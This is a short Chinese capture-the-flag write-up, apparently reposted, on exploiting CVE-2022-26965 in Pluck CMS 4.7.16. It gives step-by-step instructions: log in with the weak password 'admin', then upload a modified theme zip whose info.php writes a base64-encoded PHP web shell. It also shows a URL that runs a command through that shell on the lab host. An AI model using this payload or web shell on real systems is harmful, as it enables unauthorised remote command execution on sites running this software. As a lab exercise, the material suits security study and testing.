春秋云境:CVE-2022-26965
文章合集:春秋云境系列靶场记录(合集)文章来源地址https://www.toymoban.com/news/detail-444639.html
Pluck-CMS-Pluck-4.7.16 后台RCE:CVE-2022-26965
漏洞介绍
Pluck-CMS-Pluck-4.7.16 后台RCE
解题步骤
-
过弱口令登录:admin
-
登录之后按照图中位置进行主题安装
-
按照这位大哥文章:
https://blog.csdn.net/weixin_39639260/article/details/116105945
中说的,需要将主题中的info.php文件修改,再打包成zip再上传,通过网络搜索找到Github中的Pluck CMS,进入后随便下载任一主题: -
对主题进行解压得到info.php,修改info.php文件内容,并重新打包成zip文件:
<?php
file_put_contents('testshell.php',base64_decode('PD9waHAgc3lzdGVtKCRfR0VUWzFdKTs/Pg=='));
?>
-
将刚才打包的zip主题进行上传
-
访问根目录下的testshell.php并进行命令执行:http://eci-jbxi1zebqg9.cloudeci1.ichunqiu.com/testshell.php?1=cat%20/flag
文章来源:https://www.toymoban.com/news/detail-444639.html
文章合集:春秋云境系列靶场记录(合集)
到了这里,关于春秋云境:CVE-2022-26965的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!